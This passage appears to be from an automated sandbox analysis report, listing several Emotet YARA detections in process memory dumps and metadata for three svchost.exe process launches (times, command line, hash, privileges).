                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:12:16
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:12:32
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:12:43
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis
